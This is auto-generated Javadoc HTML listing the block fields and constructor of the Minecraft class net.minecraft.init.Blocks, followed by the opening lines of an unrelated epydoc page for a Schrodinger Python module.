<h4>farmland</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> farmland</pre>
</li>
</ul>
<a name="furnace">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>furnace</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> furnace</pre>
</li>
</ul>
<a name="lit_furnace">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>lit_furnace</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> lit_furnace</pre>
</li>
</ul>
<a name="standing_sign">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>standing_sign</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> standing_sign</pre>
</li>
</ul>
<a name="wooden_door">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>wooden_door</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> wooden_door</pre>
</li>
</ul>
<a name="ladder">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>ladder</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> ladder</pre>
</li>
</ul>
<a name="rail">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>rail</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> rail</pre>
</li>
</ul>
<a name="stone_stairs">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>stone_stairs</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> stone_stairs</pre>
</li>
</ul>
<a name="wall_sign">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>wall_sign</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> wall_sign</pre>
</li>
</ul>
<a name="lever">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>lever</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> lever</pre>
</li>
</ul>
<a name="stone_pressure_plate">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>stone_pressure_plate</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> stone_pressure_plate</pre>
</li>
</ul>
<a name="iron_door">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>iron_door</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> iron_door</pre>
</li>
</ul>
<a name="wooden_pressure_plate">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>wooden_pressure_plate</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> wooden_pressure_plate</pre>
</li>
</ul>
<a name="redstone_ore">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>redstone_ore</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> redstone_ore</pre>
</li>
</ul>
<a name="lit_redstone_ore">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>lit_redstone_ore</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> lit_redstone_ore</pre>
</li>
</ul>
<a name="unlit_redstone_torch">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>unlit_redstone_torch</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> unlit_redstone_torch</pre>
</li>
</ul>
<a name="redstone_torch">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>redstone_torch</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> redstone_torch</pre>
</li>
</ul>
<a name="stone_button">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>stone_button</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> stone_button</pre>
</li>
</ul>
<a name="snow_layer">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>snow_layer</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> snow_layer</pre>
</li>
</ul>
<a name="ice">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>ice</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> ice</pre>
</li>
</ul>
<a name="snow">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>snow</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> snow</pre>
</li>
</ul>
<a name="cactus">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>cactus</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> cactus</pre>
</li>
</ul>
<a name="clay">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>clay</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> clay</pre>
</li>
</ul>
<a name="reeds">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>reeds</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> reeds</pre>
</li>
</ul>
<a name="jukebox">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>jukebox</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> jukebox</pre>
</li>
</ul>
<a name="fence">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>fence</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> fence</pre>
</li>
</ul>
<a name="pumpkin">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>pumpkin</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> pumpkin</pre>
</li>
</ul>
<a name="netherrack">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>netherrack</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> netherrack</pre>
</li>
</ul>
<a name="soul_sand">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>soul_sand</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> soul_sand</pre>
</li>
</ul>
<a name="glowstone">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>glowstone</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> glowstone</pre>
</li>
</ul>
<a name="portal">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>portal</h4>
<pre>public static final <a href="../../../net/minecraft/block/BlockPortal.html" title="class in net.minecraft.block">BlockPortal</a> portal</pre>
</li>
</ul>
<a name="lit_pumpkin">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>lit_pumpkin</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> lit_pumpkin</pre>
</li>
</ul>
<a name="cake">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>cake</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> cake</pre>
</li>
</ul>
<a name="unpowered_repeater">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>unpowered_repeater</h4>
<pre>public static final <a href="../../../net/minecraft/block/BlockRedstoneRepeater.html" title="class in net.minecraft.block">BlockRedstoneRepeater</a> unpowered_repeater</pre>
</li>
</ul>
<a name="powered_repeater">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>powered_repeater</h4>
<pre>public static final <a href="../../../net/minecraft/block/BlockRedstoneRepeater.html" title="class in net.minecraft.block">BlockRedstoneRepeater</a> powered_repeater</pre>
</li>
</ul>
<a name="trapdoor">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>trapdoor</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> trapdoor</pre>
</li>
</ul>
<a name="monster_egg">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>monster_egg</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> monster_egg</pre>
</li>
</ul>
<a name="stonebrick">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>stonebrick</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> stonebrick</pre>
</li>
</ul>
<a name="brown_mushroom_block">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>brown_mushroom_block</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> brown_mushroom_block</pre>
</li>
</ul>
<a name="red_mushroom_block">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>red_mushroom_block</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> red_mushroom_block</pre>
</li>
</ul>
<a name="iron_bars">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>iron_bars</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> iron_bars</pre>
</li>
</ul>
<a name="glass_pane">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>glass_pane</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> glass_pane</pre>
</li>
</ul>
<a name="melon_block">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>melon_block</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> melon_block</pre>
</li>
</ul>
<a name="pumpkin_stem">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>pumpkin_stem</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> pumpkin_stem</pre>
</li>
</ul>
<a name="melon_stem">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>melon_stem</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> melon_stem</pre>
</li>
</ul>
<a name="vine">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>vine</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> vine</pre>
</li>
</ul>
<a name="fence_gate">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>fence_gate</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> fence_gate</pre>
</li>
</ul>
<a name="brick_stairs">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>brick_stairs</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> brick_stairs</pre>
</li>
</ul>
<a name="stone_brick_stairs">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>stone_brick_stairs</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> stone_brick_stairs</pre>
</li>
</ul>
<a name="mycelium">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>mycelium</h4>
<pre>public static final <a href="../../../net/minecraft/block/BlockMycelium.html" title="class in net.minecraft.block">BlockMycelium</a> mycelium</pre>
</li>
</ul>
<a name="waterlily">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>waterlily</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> waterlily</pre>
</li>
</ul>
<a name="nether_brick">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>nether_brick</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> nether_brick</pre>
</li>
</ul>
<a name="nether_brick_fence">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>nether_brick_fence</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> nether_brick_fence</pre>
</li>
</ul>
<a name="nether_brick_stairs">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>nether_brick_stairs</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> nether_brick_stairs</pre>
</li>
</ul>
<a name="nether_wart">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>nether_wart</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> nether_wart</pre>
</li>
</ul>
<a name="enchanting_table">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>enchanting_table</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> enchanting_table</pre>
</li>
</ul>
<a name="brewing_stand">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>brewing_stand</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> brewing_stand</pre>
</li>
</ul>
<a name="cauldron">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>cauldron</h4>
<pre>public static final <a href="../../../net/minecraft/block/BlockCauldron.html" title="class in net.minecraft.block">BlockCauldron</a> cauldron</pre>
</li>
</ul>
<a name="end_portal">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>end_portal</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> end_portal</pre>
</li>
</ul>
<a name="end_portal_frame">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>end_portal_frame</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> end_portal_frame</pre>
</li>
</ul>
<a name="end_stone">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>end_stone</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> end_stone</pre>
</li>
</ul>
<a name="dragon_egg">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>dragon_egg</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> dragon_egg</pre>
</li>
</ul>
<a name="redstone_lamp">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>redstone_lamp</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> redstone_lamp</pre>
</li>
</ul>
<a name="lit_redstone_lamp">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>lit_redstone_lamp</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> lit_redstone_lamp</pre>
</li>
</ul>
<a name="double_wooden_slab">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>double_wooden_slab</h4>
<pre>public static final <a href="../../../net/minecraft/block/BlockSlab.html" title="class in net.minecraft.block">BlockSlab</a> double_wooden_slab</pre>
</li>
</ul>
<a name="wooden_slab">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>wooden_slab</h4>
<pre>public static final <a href="../../../net/minecraft/block/BlockSlab.html" title="class in net.minecraft.block">BlockSlab</a> wooden_slab</pre>
</li>
</ul>
<a name="cocoa">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>cocoa</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> cocoa</pre>
</li>
</ul>
<a name="sandstone_stairs">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>sandstone_stairs</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> sandstone_stairs</pre>
</li>
</ul>
<a name="emerald_ore">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>emerald_ore</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> emerald_ore</pre>
</li>
</ul>
<a name="ender_chest">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>ender_chest</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> ender_chest</pre>
</li>
</ul>
<a name="tripwire_hook">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>tripwire_hook</h4>
<pre>public static final <a href="../../../net/minecraft/block/BlockTripWireHook.html" title="class in net.minecraft.block">BlockTripWireHook</a> tripwire_hook</pre>
</li>
</ul>
<a name="tripwire">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>tripwire</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> tripwire</pre>
</li>
</ul>
<a name="emerald_block">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>emerald_block</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> emerald_block</pre>
</li>
</ul>
<a name="spruce_stairs">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>spruce_stairs</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> spruce_stairs</pre>
</li>
</ul>
<a name="birch_stairs">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>birch_stairs</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> birch_stairs</pre>
</li>
</ul>
<a name="jungle_stairs">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>jungle_stairs</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> jungle_stairs</pre>
</li>
</ul>
<a name="command_block">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>command_block</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> command_block</pre>
</li>
</ul>
<a name="beacon">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>beacon</h4>
<pre>public static final <a href="../../../net/minecraft/block/BlockBeacon.html" title="class in net.minecraft.block">BlockBeacon</a> beacon</pre>
</li>
</ul>
<a name="cobblestone_wall">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>cobblestone_wall</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> cobblestone_wall</pre>
</li>
</ul>
<a name="flower_pot">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>flower_pot</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> flower_pot</pre>
</li>
</ul>
<a name="carrots">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>carrots</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> carrots</pre>
</li>
</ul>
<a name="potatoes">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>potatoes</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> potatoes</pre>
</li>
</ul>
<a name="wooden_button">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>wooden_button</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> wooden_button</pre>
</li>
</ul>
<a name="skull">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>skull</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> skull</pre>
</li>
</ul>
<a name="anvil">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>anvil</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> anvil</pre>
</li>
</ul>
<a name="trapped_chest">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>trapped_chest</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> trapped_chest</pre>
</li>
</ul>
<a name="light_weighted_pressure_plate">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>light_weighted_pressure_plate</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> light_weighted_pressure_plate</pre>
</li>
</ul>
<a name="heavy_weighted_pressure_plate">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>heavy_weighted_pressure_plate</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> heavy_weighted_pressure_plate</pre>
</li>
</ul>
<a name="unpowered_comparator">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>unpowered_comparator</h4>
<pre>public static final <a href="../../../net/minecraft/block/BlockRedstoneComparator.html" title="class in net.minecraft.block">BlockRedstoneComparator</a> unpowered_comparator</pre>
</li>
</ul>
<a name="powered_comparator">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>powered_comparator</h4>
<pre>public static final <a href="../../../net/minecraft/block/BlockRedstoneComparator.html" title="class in net.minecraft.block">BlockRedstoneComparator</a> powered_comparator</pre>
</li>
</ul>
<a name="daylight_detector">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>daylight_detector</h4>
<pre>public static final <a href="../../../net/minecraft/block/BlockDaylightDetector.html" title="class in net.minecraft.block">BlockDaylightDetector</a> daylight_detector</pre>
</li>
</ul>
<a name="redstone_block">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>redstone_block</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> redstone_block</pre>
</li>
</ul>
<a name="quartz_ore">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>quartz_ore</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> quartz_ore</pre>
</li>
</ul>
<a name="hopper">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>hopper</h4>
<pre>public static final <a href="../../../net/minecraft/block/BlockHopper.html" title="class in net.minecraft.block">BlockHopper</a> hopper</pre>
</li>
</ul>
<a name="quartz_block">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>quartz_block</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> quartz_block</pre>
</li>
</ul>
<a name="quartz_stairs">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>quartz_stairs</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> quartz_stairs</pre>
</li>
</ul>
<a name="activator_rail">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>activator_rail</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> activator_rail</pre>
</li>
</ul>
<a name="dropper">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>dropper</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> dropper</pre>
</li>
</ul>
<a name="stained_hardened_clay">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>stained_hardened_clay</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> stained_hardened_clay</pre>
</li>
</ul>
<a name="hay_block">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>hay_block</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> hay_block</pre>
</li>
</ul>
<a name="carpet">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>carpet</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> carpet</pre>
</li>
</ul>
<a name="hardened_clay">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>hardened_clay</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> hardened_clay</pre>
</li>
</ul>
<a name="coal_block">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>coal_block</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> coal_block</pre>
</li>
</ul>
<a name="packed_ice">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>packed_ice</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> packed_ice</pre>
</li>
</ul>
<a name="acacia_stairs">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>acacia_stairs</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> acacia_stairs</pre>
</li>
</ul>
<a name="dark_oak_stairs">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>dark_oak_stairs</h4>
<pre>public static final <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a> dark_oak_stairs</pre>
</li>
</ul>
<a name="double_plant">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>double_plant</h4>
<pre>public static final <a href="../../../net/minecraft/block/BlockDoublePlant.html" title="class in net.minecraft.block">BlockDoublePlant</a> double_plant</pre>
</li>
</ul>
<a name="stained_glass">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>stained_glass</h4>
<pre>public static final <a href="../../../net/minecraft/block/BlockStainedGlass.html" title="class in net.minecraft.block">BlockStainedGlass</a> stained_glass</pre>
</li>
</ul>
<a name="stained_glass_pane">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>stained_glass_pane</h4>
<pre>public static final <a href="../../../net/minecraft/block/BlockStainedGlassPane.html" title="class in net.minecraft.block">BlockStainedGlassPane</a> stained_glass_pane</pre>
</li>
</ul>
</li>
</ul>
<!-- ========= CONSTRUCTOR DETAIL ======== -->
<ul class="blockList">
<li class="blockList"><a name="constructor_detail">
<!-- -->
</a>
<h3>Constructor Detail</h3>
<a name="Blocks()">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>Blocks</h4>
<pre>public Blocks()</pre>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
</div>
<!-- ========= END OF CLASS DATA ========= -->
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar_bottom">
<!-- -->
</a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li class="navBarCell1Rev">Class</li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../index-all.html">Index</a></li>
<li><a href="../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev Class</li>
<li><a href="../../../net/minecraft/init/Bootstrap.html" title="class in net.minecraft.init"><span class="strong">Next Class</span></a></li>
</ul>
<ul class="navList">
<li><a href="../../../index.html?net/minecraft/init/Blocks.html" target="_top">Frames</a></li>
<li><a href="Blocks.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<div>
<ul class="subNavList">
<li>Summary: </li>
<li>Nested | </li>
<li><a href="#field_summary">Field</a> | </li>
<li><a href="#constructor_summary">Constr</a> | </li>
<li><a href="#methods_inherited_from_class_java.lang.Object">Method</a></li>
</ul>
<ul class="subNavList">
<li>Detail: </li>
<li><a href="#field_detail">Field</a> | </li>
<li><a href="#constructor_detail">Constr</a> | </li>
<li>Method</li>
</ul>
</div>
<a name="skip-navbar_bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
</body>
</html>
|
Schrodinger/Schrodinger_2012_docs/python_api/api/schrodinger.application.glide-module.html | platinhom/ManualHom | <?xml version="1.0" encoding="ascii"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>schrodinger.application.glide</title>
<link rel="stylesheet" href="epydoc.css" type="text/css" />
<script type="text/javascript" src="epydoc.js"></script>
</head>
<body bgcolor="white" text="black" link="blue" vlink="#204080"
alink="#204080">
<!-- ==================== NAVIGATION BAR ==================== -->
<table class="navbar" border="0" width="100%" cellpadding="0"
bgcolor="#a0c0ff" cellspacing="0">
<tr valign="middle">
<!-- Home link -->
<th> <a
href="schrodinger-module.html">Home</a> </th>
<!-- Tree link -->
<th> <a
href="module-tree.html">Trees</a> </th>
